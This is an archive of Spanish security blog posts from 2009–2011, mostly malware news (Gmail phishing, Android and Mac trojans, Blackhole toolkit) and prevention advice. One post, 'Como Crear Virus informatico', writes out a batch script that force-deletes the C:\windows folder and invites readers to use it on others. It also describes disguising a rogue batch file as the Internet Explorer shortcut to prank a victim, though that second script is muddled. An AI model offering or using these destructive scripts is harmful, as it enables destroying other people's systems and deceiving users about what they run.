Mostrando entradas con la etiqueta Virus y demas. Mostrar todas las entradas
Mostrando entradas con la etiqueta Virus y demas. Mostrar todas las entradas

miércoles, 1 de junio de 2011

Google denuncia un intento de espionaje proveniente de China

Gmail, el servicio de correo electrónico de Google recibió recientemente un ataque originado en China y focalizado contra cientos de usuarios elegidos por sus atacantes por ser altos funcionarios del gobierno norteamericano y surcoreano; activistas a favor de los derechos humanos; militares, y periodistas, entre otros. La empresa detectó ese ataque contra su servicio de correo y ha revelado su existencia este miércoles en su blog oficial. Los hackers se centraron en robar las contraseñas de los usuarios para espiar sus conversaciones online. La Casa Blanca ha anunciado poco después de conocerse la noticia que no cree que ninguna cuenta gubernamental haya sido violada.

"El objetivo de esos esfuerzos ha sido controlar el contenido de los correos de esos usuarios, y al parecer los perpetradores han usado las contraseñas robadas para reenviar y cambiar la delegación de esos correos", asegura Eric Grosse, director técnico del equipo de seguridad de Google. "Gmail permite reenviar los correos de forma automática, así como permitir a otros acceder a la propia cuenta".

Los hackers no han infiltrado los servidores de Google. Haciendo uso de la técnica conocida comophishing, han engañado a los usuarios para obtener sus contraseñas con correos o interfaces falsas. En la mayoría de ocasiones, al infectar algún ordenador con un virus, logran que este redireccione dominios legítimos, como gmail.com a otros falsos, como google-mail.dyndns.org. La página parece legítima pero, en lugar de introducir su contraseña en el servidor, lo que el usuario está haciendo es entregársela a los hackers. Una forma fiable de saber si la propia cuenta ha sido pirateada es comprobar la configuración de reenvío de correos.

En su blog, Google asegura, sucintamente, que el ataque se originó en "Jinan, China". Aunque explica que la operación de espionaje se centró en activistas políticos y oficiales gubernamentales, no ha apuntado directamente al gobierno chino. El gigante de la Red operó del mismo modo cuando descubrió un ataque contra sus servidores que le llevó a abandonar sus operaciones en China y a trasladar su buscador a Hong Kong, hace más de un año. Entonces, Google evitó responsabilizar directamente a Pekín, aunque pidió la cooperación de la diplomacia norteamericana para evitar que se repitiera un incidente de aquellas características.

Virus en Android



El crecimiento masivo de la Android está llevando a la plataforma de Google a ser un objetivo por parte de hackers. Tanto es así que tras un episodio de infección de virus masivo, solucionado por Google, llega otro peor, pues la empresa Lookout Security alertaba hace unos días a Google de la identificación de un nuevo virus, llamado Droid Dream Light, estaba infectando a miles de usuarios Android a través de más de una veintena de aplicaciones. 

virus android

Google ya ha eliminado por completo las aplicaciones que contenían el malware, pero lo peor es que cada vez los virus para Android son más fuertes e independientes, pues en este caso ni siquiera hacía falta la interacción del usuario para su activación. 

Aplicaciones como Falling Down, Super Guitar Solo, Photo Editor, Super Ring Tone Maker o Chess entre otras han sido las causantes de la distribución de Droid Dream Light, y aunque Google las ha eliminado, queda claro que la seguridad en los móviles es cada día más necesaria. 

miércoles, 25 de mayo de 2011

Nuevos ataques con malware y Blackhole Toolkit


Desde el día de ayer hemos recibido varias denuncias de correos que dicen venir de diversas empresas y que contienen supuestas transacciones comerciales de quien recibe el correo:
Ante la curiosidad de qué es lo que representan dichas transacciones, el usuario puede intentar abrir los enlaces que aparecen en el formulario y resultar infectado. Al hacer clic sobre el enlace acortado que se ve en la imagen, varios antivirus detectan que el sitio al cual se ingresa contiene scripts dañinos que en este caso se trata del Blackhole Toolkit, un conjunto de exploits que tienen como objetivo detectar las vulnerabilidades que el usuario tiene en su sistema y posteriormente descargar un archivo ejecutable y ejecutarlo en forma silenciosa.

Según Symantec son reportados más de 100.000 sitios maliciosos con este script cada día. Algunos de las vulnerabilidades y exploits son los siguientes:
Si el usuario dispone de esas aplicaciones y las mismas son vulnerables, seguramente resultará infectado, por lo que es fundamental actualizar todo el software que se utiliza.

Cristian de la Redacción de Segu-Info

viernes, 20 de mayo de 2011

MacDefender: Un falso anti-virus se extiende entre los Mac

Una nueva pieza de 'malware' ha acumulado un número importante de ordenadores de Apple infectados, lo que ha provocado un nuevo debate sobre el estado de la seguridad de Macintosh frente a Windows.

El troyano se llama MacDefender, y su funciona mediante un mensaje falso que advierte a los usuarios que sus máquinas están infectadas por un virus, por lo que deben instalar el 'software' anti-virus. Si los clientes aceptan instalarlo, el programa comienza a cargar sitios web con pornografía de forma esporádica.

El primero en detectar el largo hilo de problemas fue el periodista de ZDNet Ed Bott, quien advirtió que en los foro de Apple se acumulaban las quejas relacionadas con Mac Defender, con al menos 200 advertencias de clientes con máquinas infectadas por el 'malware'.

El 'éxito' del programa reside en que sus creadores han logrado que aparezca en posiciones altas en las búsquedas. Comenzó a circular en mayo, y desde entonces no ha dejado de acumular víctimas.

"He hecho búsquedas similares en el pasado y nunca he encontrado más de una o dos informes" escribió Bott, "esta vez, el volumen es realmente excepcional."

Según apunta Bott en su artículo, un técnico de AppleCare ha asegurado que las llamadas relacionadas con problemas de seguridad se han multiplicado por cuatro o cinco recientemente, la mayoría relacionadas con Mac Defender.

El eterno debate

Este nuevo problema de 'malware' ha vuelto a poner en la palestra el debate sobre si es más seguro Mac o Windows. Como apunta Wired, a pesar de que el problema de MacDefender se ha extendido mucho en cantidad, no puede compararse en nivel de gravedad. La plataforma de Mac ha sido fácil de penetrar en los últimos años, pero Windows siempre ha sido un blanco más 'jugoso' para los 'hackers' maliciosos, ya que tiene una cuota de mercado superior a la de Mac.

Charlie Miller, investigador de seguridad, afirmó a Wired que Microsoft ha señalado recientemente que una de cada 14 descargas en Windows tiene contenido malicioso. Y el hecho de que por una sola pieza de 'malware' de Mac se esté discutiendo por la seguridad demuestra que el 'malware' sigue siendo rara en la plataforma de Macintosh.

Además, apunta Wired, aunque 200 quejas sobre Mac Defender en los foros de Apple puedan parecer muchas, sigue siendo una pequeña fracción de los millones de usuarios que Mac tiene en el mundo. "Mac Defender demuestra que el problema está empeorando y que la gente debe ser más cautelosa acerca del 'malware', pero eso no significa necesariamente que cada usuario de Mac deba apresurarse a comprar un 'software' anti-virus", dijo Miller.

Graham Cluley, consultor tecnológico senior de Sophos, dijo a la BBC que "la gran mayoría de los malware que se detecta va dirigido a los usuarios de Windows. Cerca de 100.000 nuevos programas maliciosos para Windows se detectan todos los días". "A pesar de que el que existe para Mac OS X es mucho menos dañino que el existente para Windows, no hay razón para pensar que no hay amenazas de Mac".

La publicación Ars Technica realizó una investigación sobre el estado del 'malware' para Mac hablando con 14 especialistas de soporte de Mac. "La verdad es difícil de desentrañar", dijo Jacqui Cheng, "En parte debido a que Mac OS X sigue representando un porcentaje relativamente pequeño de la cuota de mercado mundial, y en parte porque la propia Apple es una compañía 'secreta', no es fácil saber si el 'malware' en Mac es realmente cada vez más común, o simplemente es que se informa con más frecuencia."

Aunque la conclusión no es clara, la realidad es que hay que ser cauteloso a la hora de instalar 'software' que proviene de fuentes desconocidas. Mac Defender puede ser la primera llamada de atención para las personas que creen que los Mac no tienen virus.

jueves, 19 de mayo de 2011

Mamá, ¿de dónde vienen los virus?

La mejor protección antivirus no está compuesta por ceros y unos, sino por millones de unidades neuronales interconectadas. Efectivamente, es nuestro cerebro.

Cuando nuestro software antivirus, que nos protege en tiempo real, nos avisa de que le ha parado los pies a determinado malware antes de que se esparciera por el PC, hemos ganado la guerra, pero perdimos la primera batalla: evitar el peligro antes de que nos pueda afectar.

Los antivirus son cualquier cosa menos infalibles, por lo que es muy recomendable no dejar recaer sobre ellos todo el peso de la seguridad. Vamos a ver las formas más comunes de coger un catarro informático, y cómo evitarlo en la medida de lo posible.

Programas que en verdad son virus

Desgraciadamente para el resto de los mortales, hay personas cuyo mayor afán es repartir virus y troyanos a diestro y siniestro.

Las causas son variadas y provienen desde los propios autores de los virus hasta estafadores que pretenden obtener información (tarjetas de crédito, etc.) de sus víctimas mediante troyanos.

Modos de resultar infectado

  • Descargando ejecutables desde programas P2P, uno de los lugares preferidos por los difusores de virus y troyanos.
  • Descargando programas desde sitios web que no son de fiar.
  • Ejecutando archivos adjuntos de correo que no sabemos explícitamente qué son.
  • Aceptando y ejecutando archivos enviados por algún contacto malintencionado.

Medidas para estar protegido

  • Analiza con antivirus todo software descargado desde programas P2P y desconfía de los programas con pocas fuentes, con un icono distinto al suyo o que ocupan demasiado -o demasiado poco- para lo que debería ser.
  • Busca siempre fuentes fiables desde donde descargar programas. Hazlo desde lugares como Softonic o la página web oficial del programa. Asegúrate de que la página web que estás visitando es realmente la página oficial y no una copia.
  • Pregunta a tus contactos qué es ese archivo ejecutable que te han enviado por correo o mensajería instantánea y no lo ejecutes si no obtienes una respuesta convincente.

Archivos infectados

Los virus informáticos tienen con frecuencia la irritante costumbre de autoreplicarse, infectando todo archivo ejecutable que se les ponga a tiro. Ejecutar uno de estos archivos trae las mismas consecuencias que el caso anterior: la infección.

Modos de resultar infectado

  • Aceptar y ejecutar archivos enviados o procedentes de un equipo infectado (o que crees que pudiera estarlo).
  • Descargar programas puestos en Internet por personas que no son de fiar y pudieran tener virus en sus equipos.

Medidas para estar protegido

  • Confiar únicamente en tu seguridad y analizar todo aquello que te envien aquellos contactos no demasiado preocupados por la misma.
  • Descargar software desde sitios web profesionales como Softonic o las páginas web de los programas.

Pendrives / Tarjetas de memoria

Las tarjetas de memoria son los disquettes de hoy en día. Si antiguamente los virus tenían especial predilección por ellos, hoy prefieren utilizar pendrives y tarjetas de memoria como abejas polinizadoras con las que infectar todos los lugares por donde pasan.

Modos de resultar infectado

  • Haciendo uso del arranque automático en estas unidades cuando un virus se ha instalado en él.

Medidas para estar protegido

  • Deshabilitar el autoarranque en estas unidades y/o seleccionando Explorar en el menú de Reproducción automática en lugar de ejecutar su programa de arranque, si lo tuviera.
  • Tener especial cuidado con aquellos pendrives que han pasado por varios equipos.

Red local

Si tu equipo está conectado a una red local, debes velar por la seguridad de todos los equipos de la misma red para proteger al tuyo propio.

Normalmente utilizamos las redes locales para intercambiar archivos y acceder a discos duros de otros ordenadores, relajando nuestra seguridad en pro de la comodidad.

Modos de resultar infectado

  • Cuando un equipo de la red resulta infectado por un virus que se propaga por la red local.
  • Ejecutar archivos infectados desde otro equipo de la red.

Medidas para estar protegido

  • No descuidar la seguridad de ninguno de los equipos de la red.
  • Establecer contraseñas y permisos para acceder a los distintos recursos de la red.

Errores y agujeros en el software (exploits, backdoors...)

En ocasiones el problema no está en nosotros sino en aquello que utilizamos. Los hackers pueden haber encontrado un agujero en su programación mediante el cual obtener el control de la máquina e introducir software en su interior.

Un buen ejemplo es Internet Explorer que, unido a navegar por páginas web maliciosas, puede ocasionar diversos males a tu ordenador (barras de herramientas, ventanas emergentes con publicidad...)

Modos de resultar infectado

  • No instalar las actualizaciones de seguridad de Windows.
  • Utilizar versiones desfasadas de los programas.

Medidas para estar protegido

  • Mantener Windows al día con las últimas actualizaciones.
  • Actualizar el software. Secunia PSI puede ayudarte a encontrar programas desfasados que presentan vulnerabilidades.
  • Utilizar software más seguro. Por ejemplo dejar de lado a Internet Explorer.

Terceras personas

¿Eres la persona más cuidadosa del mundo y aún así tienes problemas con virus? Si alguien más está utilizando tu ordenador, es muy probable que ahí esté el origen de tus problemas.

Modos de resultar infectado

  • Otra persona utiliza el ordenador sin tener en cuenta los apartados anteriores.

Medidas para estar protegido

  • Utiliza una cuenta de usuario sin privilegios de administrador para estas terceras personas.
  • Programas como Deep Freeze pueden ayudarte a que tu PC se mantenga inalterable después de que lo use la persona más descuidada del mundo.

martes, 15 de diciembre de 2009

Identificando al enemigo: Qué es un verdadero virus informático y cómo actúa

Amigos, el término virus en nuestros días se ha hecho tan común que ahora lo usamos para describir a casi todo el software malicioso que conocemos: troyanos, backdoors, spyware, bots, keyloggers, rootkits, etc.

En realidad el término más adecuado para todo lo que acabamos de describir es: MALWARE ( que viene de MALicious softWARE) o Software malicioso.

Software malicioso es todo aquel que contiene código hostil e intrusivo y que sin consentimiento informado del usuario se ejecuta sobre el ordenador. Cuando digo consentimiento informado hablo de aquel en el que el usuario tiene plena conciencia de los efectos, implicaciones y consecuencias de lo que sucederá si decide ejecutar determinado programa.

Considero que es bueno poder diferenciar a todo el Software Malicioso, ya que puede ayudarnos a identificarlos, analizarlos y de acuerdo a esto, incluso podamos escoger el método más adecuado de eliminación y/o desinfección.

Con este post inicio la saga que denominaré: ” Identificando al Enemigo”, y como tema inicial: Qué es un virus informático.

Posteriormente, los temas serán:

Identificando al enemigo: Qué es un gusano.
Identificando al enemigo: Qué es un troyano.
Identificando al enemigo: Qué es Adware y Spyware.
Identificando al enemigo: Qué es un backdoor.
Identificando al enemigo: Qué es una BotNet.
Identificando al enemigo: Qué es un Bug y un Exploit.
Identificando al enemigo: Qué es un Rootkit.
Identificando al enemigo: Qué es una Bomba Lógica.
Identificando al enemigo: etc…

Cada tema contendrá ejemplos reales y muestras de cómo funcionan.

Empecemos ahora definiendo e identificando a los verdaderos virus.

Un virus informático al igual que un virus biológico, necesita un huesped en el cual insertar su código, este huesped infectado a su vez, va infectando a los demás. Para nuestro caso los huéspedes suelen ser archivos ejecutables y/o correos, archivos html, etc.

Un virus informático en el sentido correcto entonces, es aquel que es capaz de insertar su código dentro un programa, correo o archivo HTML y también dentro de documentos de Microsoft Office (en el caso de los Virus de Macros), de modo que al ejecutarse el programa, abrir el correo, el documento o la página web, se ejecute también el código del virus. El virus al ser ejecutado es cargado en memoria y desde ahí procede a infectar los demás archivos, y es así como se reproduce

La siguiente imagen es una muestra de cómo un virus infector inserta su código en el archivo huesped.
virus

Como podemos ver en la figura, el virus escribe parte de su código en el archivo, parcha rutinas y mueve ciertas secuencias o segmentos de código a otras partes de modo que el archivo oprograma pueda seguir ejecutándose. En algunos casos - y dependiendo de la técnica de infección - el tamaño del archivo infectado puede crecer o no, de acuerdo a la cantidad de bytez insertados por el virus.

Esto diferencia a los infectores de sobreescritura destructiva que sólo escriben su código sin preocuparse de que el archivo siga siendo válido. Un infector de sobreescritura destructiva una vez que infecta un archivo, solamente ejecutará su rutina más ya no el código delprograma original. Es por eso que muchas veces es facil darnos cuenta cuando algo está mal. Este tipo de virus son más fáciles de detectar por las razones mencionadas.

Los verdaderos virus, a parte de sobreescribir su código se aseguran de que el archivo o ejecutable siga “funcionando” de modo que al ejecutarse el código delprograma, también se ejecute el código insertado del virus. Si el virus está bien diseñado es bien dificil que se note la infección, pues todo aparenta seguir funcionando normalmente. Este es el caso de los tan conocidos y mencionados Virus Sality, Halman, Virut, etc.

Esto es lo que diferencia un virus de un gusano. El gusano necesita copias de sí mismo para seguir propagándose ( ya sea por autoejecución de autoruns - lo más usual en la actualidad-, autoinicio en el registro del sistema, etc).

En cambio el virus, infecta e inserta su código en el huesped (ejecutables, mensaje de correo, archivo html, documentos, etc) y ahí es donde se transporta. Cuando el archivo infectado es ejecutado, también se ejecuta el código delvirus. No percibimos la ejecución anomal o el cambio a simple vista ya que un gusano lo podemos detectar al encontrar un archivo raro dentro de nuestras carpetas, pero al virus no - al menos a simple vista ( ya veremos más adelante cómo podemos verificar que nuestros archivos y/o ejecutables han sido modificados) -.

Por ejemplo el virus Sality busca en todas las unidades locales y de red por archivos ejecutables de formato PE e inserta su código dentro ellos. Esto es, reemplaza el Punto de Entrada (Entry Point) de los archivos y lo infecta con su código viral y se agrega así mismo al final de la última sección de la Imagen del archivo PE. Esto - dependiendo de la variante y la técnica de infección - hace que el tamaño del archivo crezca en unos cuantos KiloBytes, si es que usa la técnica de infección EPO y si usa la técnica Cavity, posiblemente ni aumente en tamaño.

  • EPO (Entry Point Obscure) (Ocultamiento del Punto de Entrada o de Ejecución).- Es una técnica para infectar programas mediante la cual un virus intenta ocultar su punto de entrada para evitar ser detectado. El virus, en lugar de tomar el control y realizar sus acciones al principio del programa (de su utilización o ejecución), permite el correcto funcionamiento de éste hasta un cierto momento en el que comienza a actuar.
  • Cavity: Es una técnica utilizada por algunos virus y gusanos para dificultar su localización. Aplicando dicha técnica consiguen no variar el tamaño de cada uno de los ficheros infectados o afectados insertando su código en los espacios en blanco(”cavidades”) del archivo.

En la mayoría de los casos los virus infectores de ejecutables pueden acarrear daños irreparables a los archivos con las técnicas mencionadas, ya que dificultan no solamente su detección sino también su eliminación. Y también la mayoría de las veces la única forma de remover elvirus es remover también el archivo infectado, lo que significa mejor formatear el sistema operativo, e instalar las aplicaciones desde fuentes confiables.

Amigos, acabamos de ver a grandes rasgos la definición más acertada sobre virus informático. En los temas posteriores veremos que en la actualidad hay mucho malware que combina las características de gusanos, bots,rootkits, exploits, etc…

El siguiente video tiene un tamaño de 39 MB y tiene una duración de 32 minutos .

El video está dividido en las siguientes secciones:

Identificando al Enemigo: Qué es un Virus Informático.

Caso: Virus Virut

1. - DEFINICIÓN DE VIRUS INFORMÁTICO

  • 1.1.- Infector de ejecutables VIRUT

2.- ANALISIS PREVIO LA INFECCION

  • 2.1.- Verificación de integridad en archivos
  • 2.1.1.- HashChecker Shell Extension
  • 2.1.2.- Spy The Spy
  • 2.1.3.- Verificación de carpeta WINDOWS
  • 2.1.4.- Copia de seguridad de msconfig.exe para posterior verificación.

3. ANALISIS POST-INFECCION

  • 3.1.- Ejecución de archivo infectado
  • 3.2.- Monitoreo de modificaciones con Spy the Spy
  • 3.3.- Comparación de Hashes MD5 de archivos
  • 3.4.- Copia de muestra de msconfig.exe Infectado para comparación con msconfig_original.exe
  • 3.5.- Comparación entre archivos original e infectado
  • 3.5.1.- A simple vista : tamaño
  • 3.5.2.- Comparación de hashes: Sumas MD5.
  • 3.5.3.- Internamente : Estructura binaria y en código usando Araxis Merger e IDA (Interactive DissAssembler)

Espero les guste el video.

Para descargar el video haz click en el siguiente enlace:

imagesthumbnail




Fuente:

sábado, 5 de diciembre de 2009

Ranki de los mejores virus y mas potentes de octubre segun ESET

Ya se encuentra disponible el reporte de las amenazas más destacadas de octubre.  Según nuestro sistema estadístico ThreatSense.Net, este es el Top 10 del malware con mayor propagación durante octubre:
1.  Win32/Conficker
Porcentaje total de detecciones: 8.85%
Es un gusano que se propaga utilizando Internet como plataforma de ataque, aprovechando diferentes vulnerabilidades en sistemas operativos Microsoft Windows que ya han sido corregidas, además de otras tecnologías como los dispositivos de almacenamiento removible y recursos compartidos en redes. De esta manera, un atacante puede controlar el sistema de forma remota y realizar acciones maliciosas sin necesidad de utilizar credenciales de usuario válidas.
2. INF/Autorun
Porcentaje total de detecciones: 7.73%
Es un código malicioso utilizado para ejecutar y proponer acciones automáticamente cuando un medio externo como un CD, DVD dispositivo USB, es leído por el equipo informático.
3. Win32/PSW.OnLineGames
Porcentaje total de detecciones: 7.29%
Es un troyano con capacidades de keylogger y de rootkit que recolecta información vinculada a los juegos en línea y sus usuarios y contraseñas.

4. Win32/Agent
Porcentaje total de detecciones: 2.41%
Es una detección genérica que describe a una serie de integrantes de una amplia familia de malware capaz de robar información del usuario de equipos infectados.
5. INF/Conficker
Porcentaje total de detecciones: 1.96%
La detección INF/Conficker es utilizada para describir una variedad de malware que se propaga junto con el gusano Conficker y utiliza el archivo autorun.inf para comprometer al equipo informático.
6. Win32/FlyStudio
Porcentaje total de detecciones: 1.94%
La amenaza Win32/FlyStudio está diseñada para modificar la información dentro del navegador web de la víctima. Este código malicioso modificará las solicitudes de búsquedas, con la intención de mostrar publicidades al usuario.
7. Win32/Qhost
Porcentaje total de detecciones: 1.58%
Es un troyano que se copia a sí mismo a la carpeta %system32% de Windows para luego comunicarse bajo DNS con su servidor de comando y control. Win32/Qhost permite que el atacante tome el control del equipo infectado y modifica al archivo host para redireccionar el tráfico a dominios específicos.
8. Win32/Pacex.Gen
Porcentaje total de detecciones: 1.25%
La firma Pacex.Gen designa a un amplio rango de archivos maliciosos que utilizan una capa específica de ofuscación. El sufijo .Gen quiere decir “genérico” lo que significa que cubre un amplio número de variantes conocidas y puede además detectar variantes desconocidas con características similares.
9. Win32/AutoRun
Porcentaje total de detecciones: 0.83%
Las amenazas identificadas con la firma ‘AutoRun’ son conocidas por utilizar el archivo Autorun.INF. Este archivo es utilizado para el arranque automático de programas cuando se inserta un dispositivo removible en un equipo informático.
10. WMA/TrojanDownloader.GetCodec.Gen
Porcentaje total de detecciones: 0.70%
GetCodec es un tipo de malware que modifica los archivos de audio, transformando aquellos encontrados en el equipo infectado al formato WMA y agregando un campo en el encabezado que incluye una dirección web apuntando al usuario hacia un nuevo Codec que deberá ser descargado para poder leer el archivo.
Para ver el reporte de las amenazas destacadas de octubre se puede visitar el Blog de Laboratorio y para leer la nota completa se puede acceder a nuestro Centro de Prensa.


FUENTE

domingo, 18 de octubre de 2009

Aparecen virus tipo troyano para el Mac OS de Apple


"OSX.RSPlug.A" se llama un troyano que plaga desde hace un tiempo a los usuarios de Mac.



Munich (DPA). Hasta ahora todo era tan simple para los usuarios de Mac: los virus y demás software malicioso afectaban a los PC de Windows, pero no a ellos. Pero esto está cambiando. "Los peligros han recrudecido", dice Candid West, representante del fabricante de antivirus Symantec.

"OSX.RSPlug.A" se llama un troyano que plaga desde hace un tiempo a los usuarios de Mac. Pretende ser un codec necesario para ver determinados vídeos pornográficos, pero el hecho es que redirige a la persona a un falso sitio Web que se asemeja a una página de eBay. Si el usuario cae en la trampa, este virus trata entonces de ganar acceso a los datos de su cuenta en eBay.

"Este troyano no ha llamado mucho la atención", dice Walter Mehl, de la revista "MacWelt" de Munich. Quizás porque sólo se ha difundido en sitios de pornografía. Además, estaba pobremente programado.

Otro troyano se apoderó a comienzos de este año de los Mac, atrayéndolos hacia un "botnet". Un botnet es una red de computadoras de control remoto para enviar spam o correo basura. Se estima que hasta ahora han sido infectadas más de 20.000 máquinas Mac. Esta cifra, no obstante, palidece en comparación con los millones de PC Windows infectados por el gusano Conficker, que hizo su aparición en octubre del año pasado.

Windows es favorito de los piratas informáticos, porque tiene una mayor base de usuarios. Los hackers saben que basta infectar una fracción de tantas computadoras para hacer mucho daño. Lo mismo vale para la búsqueda de vulnerabilidaramas de uso común.

Hasta ahora, los virus estaban dedicados sólo a sistemas operativos específicos. Pero esto ha ido cambiando últimamente, señala Mehl. Por ejemplo, se descubrió recientemente que archivos PDF falsificados podían explotar un agujero en la seguridad de Adobe Flash. El problema afecta tanto a computadoras Windows como a máquinas Mac OS. Se aconseja a los usuarios proteger no sólo al sistema operativo Mac sino también programas como Flash o Firefox.

"Hay todavía poco malware para el Mac", indica Mehl. Pero hay cada día más gente trabajando con Mac OS, con lo que se revelan puntos vulnerables que antes se desconocía. La amenaza potencial ha crecido. "Por eso creo que Mac OS necesita ahora también de software protector", señala.

Apple afirma que el Mac usa tecnología integrada para combatir el malware. Pero, puesto que no hay sistema que sea ciento por ciento inmune a ataques, los programas antivirus proporcionan una capa protectiva adicional. La revista MacWelt recomienda dos programas de seguridad para Mac OS: el Norton Internet Security para Mac, de Symantec, y el VirusBarrier, de Intego.

La instalación de software antivirus es tan sólo una parte de la batalla, señala Candid W�est. "Cualquiera que sea el sistema operativo que se use, hay que estar constantemente al acecho". Los ataques de "phishing", en que los delincuentes tratan de engañar al usuario para que revele sus contraseñas y otros datos de seguridad, afectan tanto a los usuarios del Mac como a los de Windows o Linux. Esto quiere decir que el usuario debe pensarlo dos veces antes de clicar enlaces no solicitados a través de email, Twitter o cualquier otro método que proporcione Internet.


sábado, 17 de octubre de 2009

Como Crear Virus informatico yEl Pantallazo Azul

Hola gente!, Hoy Les Presento Como crear un virus informático y la clásica pantalla azul de la muerte:

NO SE SI REALMENTE LO CREAN, HASTA YO TENGO MIS DUDAS SOBRE ELLO, IGUAL, POR SUS CREADORES (o presentadores) ES VERDAD.

ACÁ LES MANDO ALGUNOS DE COMO CREAR VIRUS INFORMÁTICOS:

1- Como hacer un virus que elimine el sistema Windows:

(paso 1)-Para crear esto, tienen que escribir lo siguiente en un bloc de notas:

@echo off
title g00d by3 wind0w5
echo 4di05 a tu wind0w5
del /s /f /q C:\windows
exit

(paso 2)-Después entran a archivo, guardar como, le ponen el nombre que deseen (PERO TERMINADO EN .bat)

(paso 3)-luego se supone por loica que se creará un archivo .bat con el clásico iconito de la tuerca...

(paso 4)-ustedes sabrán que hacer con esto...

[NOTA: no es un juego, si usted quiere hacerlo bueno todo queda a su responsabilidad]


2-Pantalla Azul De La Muerte:

Para los que no saben que es, ahí les explico:

La llamada Blue Screen of Death o BSoD (más conocida en español como pantalla azul de la muerte o «pantallazo azul»), hace referencia a la pantalla mostrada por el sistema operativo Windows de Microsoft cuando no puede (o está en peligro de no poder) recuperarse de un error de sistema. Hay dos pantallas de error de Windows referidas como pantallas azules de la muerte, siendo una de ellas bastante más seria que la otra:
Una pantalla azul de la muerte es conocida como un "Stop Error" o "Error de detención grave" en los manuales de Windows XP.

Una pantalla azul de la muerte "real" sucede cuando el núcleo del sistema operativo Windows XP no puede recuperarse de un error y la única acción que un usuario puede realizar es reiniciar el sistema perdiendo todo el trabajo no guardado, el estado de todos los programas ejecutándose en ese momento y poniendo en peligro la integridad del sistema de archivos y los archivos mismos creados mediante Windows, en este punto es posible perder toda la información en los discos duros gestionados por windows y su sistema de archivos NTFS o FAT 16/FAT 32.

La información mostrada en la pantalla azul de la muerte no es, en ningún caso, suficiente para determinar el error. La pantalla sólo muestra el punto en el cual el código falló, que en la mayoría de las veces puede ser completamente diferente del punto donde el error fue originado, causando que la detección del error sea difícil.



Esto es para los picaros que les gusta hacer trampas.

(paso 1)-Para crear esto tienen que escribir esto en un bloc de notas(SUPUESTAMENTE):

start
virus
start
2ventanas
start
virus
start
3ventanas
start
virus
start
4ventanas

(paso 2)-Como se es obvio se guarda en el escritorio con el nombre: Internet explorer, o el explorador que este utilizando al que le queremos tirar la bronca...

(paso 3)- Ahora le vamos a dar estilo, para eso, le damos click con el botón secundario de tu mouse, vamos a "propiedades", cambiar icono, para darle justo en el icono idéntico al del explorador, simplemente van a [C:\Archivos de programa] ahí seguro se instalo el explorador, encontrar el icono ahí y simplemente cambiarlo...

(paso 4)-Reemplazamos el icono de acceso directo al explorador original, y le ponemos nuestra trampa...

Y LISTO... CUANDO ENTRE LA PANTALLA AZUL DE LA MUERTE SE ACTIVARA.


Fuente:

jueves, 1 de octubre de 2009

¿Como se distribuyen las infecciones de virus informáticos

Algunos de los principales productores de malware como Rusia o China son también los países más afectados por la acción de los virus. Sorprende el cuarto puesto de España y el quinto de Argentina, lo que podría indicar que los usuarios de estos países son descuidados con la seguridad de sus computadoras.

Los Estados Unidos solamente se encuentran en una muy digna novena posición de este ránking pese a ser uno de los principales países de origen del malware que se distribuye en todo el mundo. El estudio ha sido llevado a cabo por Panda Security a partir de los resultados de aquellos internautas que han utilizado su servicio gratuito online de análisis Panda ActiveScan.

Este servicio consiste en un antivirus que se instala como control ActiveX y se ejecuta a través del navegador web Internet Explorer en el momento, no dejando ningún módulo residente instalado. Su uso mejora si se ejecuta en un sistema Windows que ha sido iniciado en modo a prueba de fallos con soporte para red.

Es también por este origen que puede suponerse que los resultados del estudio están un poco “inflados”, ya que este tipo de herramientas son utilizadas habitualmente como remedio secundario por aquellos internautas que sospechan que su computadora puede estar infectada, o bien por técnicos informáticos como parte de la limpieza de una máquina, por lo que de entrada un alto porcentaje de su uso corresponde a sistemas que presentan síntomas claros de infección. Con ello puede presuponerse que un alto porcentaje de usos corresponderá a computadoras efectivamente infectadas.

La lista de países con más máquinas afectadas por malware (virus, troyanos, espías,...) está encabezada por Taiwan (69,10% de máquinas infectadas) seguida por la Federación Rusa (67,99%) y la República Popular China (61,97%). De estos tres países, el segundo y el tercero constan también en las primeras posiciones de los lugares en los que se produce y distribuye mayor cantidad de malware, con lo que una conclusión rápida es que este tipo de software es distribuido en primer lugar de forma doméstica, por lo que a los virii rusos y chinos parece no importarles mucho que sean sus mismos conciudadanos quienes sufran las consecuencias de sus acciones.

Estos números también nos dan otra conclusión, y es que la seguridad de los equipos de los usuarios en estos países deja bastante que desear.

Un dato contradice esta estadística: los Estados Unidos, también uno de los principales orígenes del malware, consta “solamente” en una muy digna novena posición con un 58,25% de sus equipos infectados, lo que indicaría que o bien el malware creado allí se dirige hacia otros países, o bien que la seguridad es mayor.

Otro aspecto a destacar es que España y Argentina se encuentran en cuarto y quinto puesto de la lista de los más infectados, con un 61,69% y un 61,52% respectivamente. No constando entre los principales orígenes del malware, este dato nos da a entender que la seguridad en ambos casos es descuidada por sus internautas.

Otra conclusión rápida que podemos sacar del informe, y viendo que la media de equipos infectados por país se acerca al 60% y que ha aumentado en un 15% durante el último mes, es que el malware se está haciendo cada día más peligroso, y que no son pocas las computadoras conectadas a Internet infectadas con algún tipo de programa malicioso, ya sea un virus, un troyano o alguna variante de estos.

El principal objetivo de los creadores de malware es, actualmente, conseguir datos sensibles de los usuarios como nombres y contraseñas de los servicios online, y números de cuenta bancaria. El uso de la llamada ingeniería social, con mensajes que parecen provenir de entidades bancarias u organizaciones gubernamentales, es una de las tácticas más utilizadas actualmente para robar estos datos, junto al uso de keyloggers, programas espía que almacenan todas las teclas que vamos pulsando.

Para protegerse de estas amenazas, en primer lugar hay que tener actualizados el sistema operativo y los programas instalados en nuestra computadora. Esto hará que no se puedan explotar viejos agujeros de seguridad ya descubiertos y corregidos. Seguidamente, hay que disponer del necesario software de seguridad y protección, como un antivirus, firewall y todo aquello que pudiéramos disponer. El sentido común al no hacer clic en los enlaces que nos puedan enviar por correo electrónico o para no abrir ficheros adjuntos en estos mensajes, es otra de las condiciones para mantener nuestra máquina a salvo.

Fuente: http://www.imatica.org/bloges/2009/09/300946122009.html

sábado, 26 de septiembre de 2009

La Historia del Virus Informatico





